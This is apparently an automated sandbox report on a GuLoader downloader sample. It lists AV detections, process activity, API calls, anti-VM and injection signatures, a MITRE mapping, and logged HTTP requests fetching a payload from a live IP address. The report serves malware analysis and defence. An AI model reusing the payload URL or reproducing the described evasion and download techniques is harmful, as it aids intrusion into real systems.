Edit tour

Windows Analysis Report
xLDz0WPZYc.exe

Overview

General Information

Sample name:	xLDz0WPZYc.exe renamed because original name is a hash value
Original sample name:	7cf7ab42508aedf9910b50fafaab9786be8ec80c413387d92f4a1432f66e955b.exe
Analysis ID:	1587852
MD5:	74e2251dfa1e7fbeb0e4e9ba2f6c56b4
SHA1:	468d0612612e0424ea38eb7426d893a5098d245b
SHA256:	7cf7ab42508aedf9910b50fafaab9786be8ec80c413387d92f4a1432f66e955b
Tags:	exeuser-adrian__luca
Infos:

Detection

GuLoader

Score:	68
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected GuLoader

AI detected suspicious sample

Switches to a custom stack to bypass stack traces

Tries to detect virtualization through RDTSC time measurements

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Creates a process in suspended mode (likely to inject code)

Detected non-DNS traffic on DNS port

Detected potential crypto function

Drops PE files

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Suricata IDS alerts with low severity for network traffic

Tries to resolve domain names, but no domain seems valid (expired dropper behavior)

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

xLDz0WPZYc.exe (PID: 1840 cmdline: "C:\Users\user\Desktop\xLDz0WPZYc.exe" MD5: 74E2251DFA1E7FBEB0E4E9BA2F6C56B4)

xLDz0WPZYc.exe (PID: 4416 cmdline: "C:\Users\user\Desktop\xLDz0WPZYc.exe" MD5: 74E2251DFA1E7FBEB0E4E9BA2F6C56B4)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: xLDz0WPZYc.exe PID: 1840	JoeSecurity_GuLoader_3	Yara detected GuLoader	Joe Security

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T18:43:23.540346+0100	2803270	2	Potentially Bad Traffic	192.168.2.8	62772	66.63.187.30	80	TCP
2025-01-10T18:44:38.985836+0100	2803270	2	Potentially Bad Traffic	192.168.2.8	62501	66.63.187.30	80	TCP
2025-01-10T18:45:10.438851+0100	2803270	2	Potentially Bad Traffic	192.168.2.8	62545	66.63.187.30	80	TCP
2025-01-10T18:45:41.846520+0100	2803270	2	Potentially Bad Traffic	192.168.2.8	62742	66.63.187.30	80	TCP
2025-01-10T18:46:13.238160+0100	2803270	2	Potentially Bad Traffic	192.168.2.8	62771	66.63.187.30	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: xLDz0WPZYc.exe	ReversingLabs: Detection: 55%
Source: xLDz0WPZYc.exe	Virustotal: Detection: 66%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: xLDz0WPZYc.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: xLDz0WPZYc.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\xLDz0WPZYc.exe	Code function: 0_2_0040547D GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,LdrInitializeThunk,FindNextFileA,FindClose,	0_2_0040547D
Source: C:\Users\user\Desktop\xLDz0WPZYc.exe	Code function: 0_2_00405EC1 FindFirstFileA,FindClose,	0_2_00405EC1
Source: C:\Users\user\Desktop\xLDz0WPZYc.exe	Code function: 0_2_00402645 FindFirstFileA,	0_2_00402645
Source: C:\Users\user\Desktop\xLDz0WPZYc.exe	Code function: 3_2_00402645 FindFirstFileA,	3_2_00402645
Source: C:\Users\user\Desktop\xLDz0WPZYc.exe	Code function: 3_2_0040547D GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,LdrInitializeThunk,FindNextFileA,FindClose,	3_2_0040547D
Source: C:\Users\user\Desktop\xLDz0WPZYc.exe	Code function: 3_2_00405EC1 FindFirstFileA,FindClose,	3_2_00405EC1

Source: global traffic

TCP traffic: 192.168.2.8:62496 -> 162.159.36.2:53

Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:62501 -> 66.63.187.30:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:62771 -> 66.63.187.30:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:62742 -> 66.63.187.30:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:62545 -> 66.63.187.30:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:62772 -> 66.63.187.30:80

Source: unknown

DNS traffic detected: query: 18.31.95.13.in-addr.arpa replaycode: Name error (3)

Source: global traffic	HTTP traffic detected: GET /AmDxXYvcZBeoV9.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 66.63.187.30Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /AmDxXYvcZBeoV9.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 66.63.187.30Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /AmDxXYvcZBeoV9.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 66.63.187.30Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /AmDxXYvcZBeoV9.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 66.63.187.30Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /AmDxXYvcZBeoV9.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 66.63.187.30Cache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.30
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.30
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.30
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.30
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.30
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.30
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.30
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.30
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.30
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.30
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.30
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.30
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.30
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.30
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.30
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.30
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.30
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.30
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.30
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.30
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.30
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.30
Source: unknown	TCP traffic detected without corresponding DNS query: 66.63.187.30
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /AmDxXYvcZBeoV9.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 66.63.187.30Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /AmDxXYvcZBeoV9.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 66.63.187.30Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /AmDxXYvcZBeoV9.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 66.63.187.30Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /AmDxXYvcZBeoV9.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 66.63.187.30Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /AmDxXYvcZBeoV9.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 66.63.187.30Cache-Control: no-cache

Source: global traffic

DNS traffic detected: DNS query: 18.31.95.13.in-addr.arpa

Source: xLDz0WPZYc.exe, 00000003.00000002.3329411686.0000000004FA7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://66.63.187.30/
Source: xLDz0WPZYc.exe, 00000003.00000002.3329411686.0000000004F58000.00000004.00000020.00020000.00000000.sdmp, xLDz0WPZYc.exe, 00000003.00000002.3329411686.0000000004F92000.00000004.00000020.00020000.00000000.sdmp, xLDz0WPZYc.exe, 00000003.00000002.3329600997.0000000006A50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://66.63.187.30/AmDxXYvcZBeoV9.bin
Source: xLDz0WPZYc.exe, 00000003.00000002.3329411686.0000000004F58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://66.63.187.30/AmDxXYvcZBeoV9.binE
Source: xLDz0WPZYc.exe, 00000003.00000002.3329411686.0000000004F58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://66.63.187.30/AmDxXYvcZBeoV9.binQ
Source: xLDz0WPZYc.exe, 00000003.00000002.3329411686.0000000004F58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://66.63.187.30/AmDxXYvcZBeoV9.bin_
Source: xLDz0WPZYc.exe, 00000003.00000002.3329411686.0000000004F58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://66.63.187.30/AmDxXYvcZBeoV9.bing
Source: xLDz0WPZYc.exe, 00000003.00000002.3329411686.0000000004F92000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://66.63.187.30/AmDxXYvcZBeoV9.binm32
Source: xLDz0WPZYc.exe, 00000003.00000002.3329411686.0000000004F58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://66.63.187.30/AmDxXYvcZBeoV9.biny
Source: xLDz0WPZYc.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: xLDz0WPZYc.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError

Source: C:\Users\user\Desktop\xLDz0WPZYc.exe

Code function: 0_2_00404FE4 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,LdrInitializeThunk,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,SendMessageA,CreatePopupMenu,LdrInitializeThunk,AppendMenuA,GetWindowRect,LdrInitializeThunk,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,LdrInitializeThunk,SetClipboardData,CloseClipboard,

0_2_00404FE4

Source: C:\Users\user\Desktop\xLDz0WPZYc.exe	Code function: 0_2_004030B6 EntryPoint,#17,SetErrorMode,OleInitialize,LdrInitializeThunk,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,LdrInitializeThunk,LdrInitializeThunk,GetCurrentProcess,ExitWindowsEx,ExitProcess,		0_2_004030B6
Source: C:\Users\user\Desktop\xLDz0WPZYc.exe	Code function: 3_2_004030B6 EntryPoint,#17,SetErrorMode,OleInitialize,LdrInitializeThunk,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,LdrInitializeThunk,LdrInitializeThunk,GetCurrentProcess,ExitWindowsEx,ExitProcess,		3_2_004030B6

Source: C:\Users\user\Desktop\xLDz0WPZYc.exe	Code function: 0_2_00404823	0_2_00404823
Source: C:\Users\user\Desktop\xLDz0WPZYc.exe	Code function: 0_2_00406197	0_2_00406197
Source: C:\Users\user\Desktop\xLDz0WPZYc.exe	Code function: 3_2_00404823	3_2_00404823
Source: C:\Users\user\Desktop\xLDz0WPZYc.exe	Code function: 3_2_00406197	3_2_00406197

Source: C:\Users\user\Desktop\xLDz0WPZYc.exe

Code function: String function: 004029FD appears 47 times

Source: xLDz0WPZYc.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal68.troj.evad.winEXE@3/12@1/1

Source: C:\Users\user\Desktop\xLDz0WPZYc.exe

Code function: 0_2_004042B1 GetDlgItem,SetWindowTextA,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,LdrInitializeThunk,SetDlgItemTextA,

0_2_004042B1

Source: C:\Users\user\Desktop\xLDz0WPZYc.exe

Code function: 0_2_00402036 LdrInitializeThunk,LdrInitializeThunk,CoCreateInstance,MultiByteToWideChar,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,

0_2_00402036

Source: C:\Users\user\Desktop\xLDz0WPZYc.exe

File created: C:\Users\user\AppData\Roaming\Studerekammermenneskes

Jump to behavior

Source: C:\Users\user\Desktop\xLDz0WPZYc.exe

File created: C:\Users\user\AppData\Local\Temp\nse61BC.tmp

Jump to behavior

Source: xLDz0WPZYc.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\xLDz0WPZYc.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\xLDz0WPZYc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: xLDz0WPZYc.exe	ReversingLabs: Detection: 55%
Source: xLDz0WPZYc.exe	Virustotal: Detection: 66%

Source: C:\Users\user\Desktop\xLDz0WPZYc.exe

File read: C:\Users\user\Desktop\xLDz0WPZYc.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\xLDz0WPZYc.exe "C:\Users\user\Desktop\xLDz0WPZYc.exe"
Source: C:\Users\user\Desktop\xLDz0WPZYc.exe	Process created: C:\Users\user\Desktop\xLDz0WPZYc.exe "C:\Users\user\Desktop\xLDz0WPZYc.exe"
Source: C:\Users\user\Desktop\xLDz0WPZYc.exe	Process created: C:\Users\user\Desktop\xLDz0WPZYc.exe "C:\Users\user\Desktop\xLDz0WPZYc.exe"	Jump to behavior

Source: C:\Users\user\Desktop\xLDz0WPZYc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\xLDz0WPZYc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\xLDz0WPZYc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\xLDz0WPZYc.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\xLDz0WPZYc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\xLDz0WPZYc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\xLDz0WPZYc.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\xLDz0WPZYc.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\xLDz0WPZYc.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\xLDz0WPZYc.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\xLDz0WPZYc.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\xLDz0WPZYc.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\xLDz0WPZYc.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\xLDz0WPZYc.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\xLDz0WPZYc.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\xLDz0WPZYc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\xLDz0WPZYc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\xLDz0WPZYc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\xLDz0WPZYc.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\xLDz0WPZYc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\xLDz0WPZYc.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\xLDz0WPZYc.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\xLDz0WPZYc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\xLDz0WPZYc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\xLDz0WPZYc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\xLDz0WPZYc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\xLDz0WPZYc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\xLDz0WPZYc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\xLDz0WPZYc.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\xLDz0WPZYc.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\xLDz0WPZYc.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\xLDz0WPZYc.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\xLDz0WPZYc.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\xLDz0WPZYc.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\xLDz0WPZYc.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\xLDz0WPZYc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\xLDz0WPZYc.exe

File written: C:\Users\user\AppData\Local\Temp\Settings.ini

Jump to behavior

Source: xLDz0WPZYc.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: Process Memory Space: xLDz0WPZYc.exe PID: 1840, type: MEMORYSTR

Source: C:\Users\user\Desktop\xLDz0WPZYc.exe

Code function: 0_2_00405EE8 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00405EE8

Source: C:\Users\user\Desktop\xLDz0WPZYc.exe

Code function: 0_2_10002D30 push eax; ret

0_2_10002D5E

Source: C:\Users\user\Desktop\xLDz0WPZYc.exe

File created: C:\Users\user\AppData\Local\Temp\nsh73EF.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\xLDz0WPZYc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\xLDz0WPZYc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\xLDz0WPZYc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\xLDz0WPZYc.exe	API/Special instruction interceptor: Address: 7B1655F
Source: C:\Users\user\Desktop\xLDz0WPZYc.exe	API/Special instruction interceptor: Address: 469655F

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\xLDz0WPZYc.exe	RDTSC instruction interceptor: First address: 7AB44AC second address: 7AB44AC instructions: 0x00000000 rdtsc 0x00000002 test bx, ax 0x00000005 test ch, ah 0x00000007 cmp ebx, ecx 0x00000009 jc 00007F2704766E01h 0x0000000b test ebx, eax 0x0000000d inc ebp 0x0000000e cmp edx, ebx 0x00000010 inc ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\xLDz0WPZYc.exe	RDTSC instruction interceptor: First address: 46344AC second address: 46344AC instructions: 0x00000000 rdtsc 0x00000002 test bx, ax 0x00000005 test ch, ah 0x00000007 cmp ebx, ecx 0x00000009 jc 00007F270485DFD1h 0x0000000b test ebx, eax 0x0000000d inc ebp 0x0000000e cmp edx, ebx 0x00000010 inc ebx 0x00000011 rdtsc

Source: C:\Users\user\Desktop\xLDz0WPZYc.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsh73EF.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\xLDz0WPZYc.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\xLDz0WPZYc.exe	Code function: 0_2_0040547D GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,LdrInitializeThunk,FindNextFileA,FindClose,	0_2_0040547D
Source: C:\Users\user\Desktop\xLDz0WPZYc.exe	Code function: 0_2_00405EC1 FindFirstFileA,FindClose,	0_2_00405EC1
Source: C:\Users\user\Desktop\xLDz0WPZYc.exe	Code function: 0_2_00402645 FindFirstFileA,	0_2_00402645
Source: C:\Users\user\Desktop\xLDz0WPZYc.exe	Code function: 3_2_00402645 FindFirstFileA,	3_2_00402645
Source: C:\Users\user\Desktop\xLDz0WPZYc.exe	Code function: 3_2_0040547D GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,LdrInitializeThunk,FindNextFileA,FindClose,	3_2_0040547D
Source: C:\Users\user\Desktop\xLDz0WPZYc.exe	Code function: 3_2_00405EC1 FindFirstFileA,FindClose,	3_2_00405EC1

Source: xLDz0WPZYc.exe, 00000003.00000002.3329411686.0000000004FAD000.00000004.00000020.00020000.00000000.sdmp, xLDz0WPZYc.exe, 00000003.00000002.3329411686.0000000004F58000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: xLDz0WPZYc.exe, 00000003.00000002.3329411686.0000000004FAD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW1r:!

Source: C:\Users\user\Desktop\xLDz0WPZYc.exe	API call chain: ExitProcess graph end node			graph_0-4346
Source: C:\Users\user\Desktop\xLDz0WPZYc.exe	API call chain: ExitProcess graph end node			graph_0-4509

Source: C:\Users\user\Desktop\xLDz0WPZYc.exe

Code function: 0_2_0040584E GetFileAttributesA,LdrInitializeThunk,LdrInitializeThunk,CreateFileA,

0_2_0040584E

Source: C:\Users\user\Desktop\xLDz0WPZYc.exe

Code function: 0_2_00405EE8 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00405EE8

Source: C:\Users\user\Desktop\xLDz0WPZYc.exe

Process created: C:\Users\user\Desktop\xLDz0WPZYc.exe "C:\Users\user\Desktop\xLDz0WPZYc.exe"

Jump to behavior

Source: C:\Users\user\Desktop\xLDz0WPZYc.exe

Code function: 0_2_00405BDF GetVersion,LdrInitializeThunk,LdrInitializeThunk,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

0_2_00405BDF

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	11 Process Injection	1 Masquerading	OS Credential Dumping	21 Security Software Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	11 Process Injection	LSASS Memory	3 File and Directory Discovery	Remote Desktop Protocol	1 Clipboard Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	23 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Obfuscated Files or Information	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	12 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
xLDz0WPZYc.exe	55%	ReversingLabs	Win32.Backdoor.Remcos
xLDz0WPZYc.exe	67%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nsh73EF.tmp\System.dll	0%	ReversingLabs

Source	Detection	Scanner	Label
http://66.63.187.30/AmDxXYvcZBeoV9.bin	0%	Avira URL Cloud	safe
http://66.63.187.30/AmDxXYvcZBeoV9.bing	0%	Avira URL Cloud	safe
http://66.63.187.30/	0%	Avira URL Cloud	safe
http://66.63.187.30/AmDxXYvcZBeoV9.bin_	0%	Avira URL Cloud	safe
http://66.63.187.30/AmDxXYvcZBeoV9.biny	0%	Avira URL Cloud	safe
http://66.63.187.30/AmDxXYvcZBeoV9.binE	0%	Avira URL Cloud	safe
http://66.63.187.30/AmDxXYvcZBeoV9.binQ	0%	Avira URL Cloud	safe
http://66.63.187.30/AmDxXYvcZBeoV9.binm32	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
18.31.95.13.in-addr.arpa	unknown	unknown	false		high

Contacted URLs

